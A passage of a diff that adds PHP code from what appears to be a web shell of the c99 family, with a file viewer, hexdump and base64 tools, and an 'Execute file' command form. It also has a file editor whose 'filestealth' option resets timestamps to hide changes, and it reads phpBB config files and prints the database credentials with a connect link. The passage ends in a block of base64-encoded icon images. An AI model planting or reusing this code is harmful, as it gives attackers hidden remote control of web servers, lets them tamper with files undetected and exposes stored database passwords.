+   array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
+   array("Code","code"),
+   array("Session","phpsess"),
+   array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
+   array("SDB","sdb"),
+   array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
+   array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
+   array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
+   array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
+   array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
+  );
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr><td><b>Owner/Group</b></td><td> ";    
+    $ow = posix_getpwuid(fileowner($d.$f));
+    $gr = posix_getgrgid(filegroup($d.$f));
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+   }
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+    $n = 0;
+    $a0 = "00000000<br>";
+    $a1 = "";
+    $a2 = "";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1 .= sprintf("%02X",ord($str[$i]))." ";
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2 .= "<font>0</font>"; break;
+      case 32:
+      case 10:
+      case 13: $a2 .= "&nbsp;"; break;
+      default: $a2 .= htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+      $a1 .= "<br>";
+      $a2 .= "<br>";
+     }
+    }
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+    $text = file_get_contents($d.$f);
+    $encoded = base64_decode($text);
+    echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {KingDefacerexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code")
+  {
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("\n",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by kira. Please, report us for fix.";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+     echo "</b><hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+   if (!empty($white)) {@ob_clean();}
+   highlight_file($d.$f);
+   if (!empty($white)) {KingDefacerexit();}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: application/octet-stream");
+   header("Content-length: ".filesize($d.$f));
+   header("Content-disposition: attachment; filename=\"".$f."\";");
+   echo $r;
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain");
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+   echo($r);
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   $inf = getimagesize($d.$f);
+   if (!$white)
+   {
+    if (empty($imgsize)) {$imgsize = 20;}
+    $width = $inf[0]/100*$imgsize;
+    $height = $inf[1]/100*$imgsize;
+    echo "<center><b>Size:</b>&nbsp;";
+    $sizes = array("100","50","20");
+    foreach ($sizes as $v)
+    {
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+     if ($imgsize != $v ) {echo $v;}
+     else {echo "<u>".$v."</u>";}
+     echo "</a>&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: ".$inf["mime"]);
+    readfile($d.$f);
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+}
+else
+{
+ @ob_clean();
+ $images = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
+"Wg0JADs=",
+"buffer"=>
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
+"change"=>
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=",
+"delete"=>
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
+"download"=>
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
+"forward"=>
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
+"WqsJADs=",
+"home"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
+"mode"=>
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
+"refresh"=>
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
+"search"=>
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
+"setup"=>
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
+"small_dir"=>
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"small_unk"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
+"yAsokBkQADs=",
+"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
+"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
+"sort_asc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
+"sort_desc"=>
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
+"sql_button_drop"=>
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
+"AQEAOw==",
+"sql_button_empty"=>
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
+"sql_button_insert"=>
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
+"up"=>
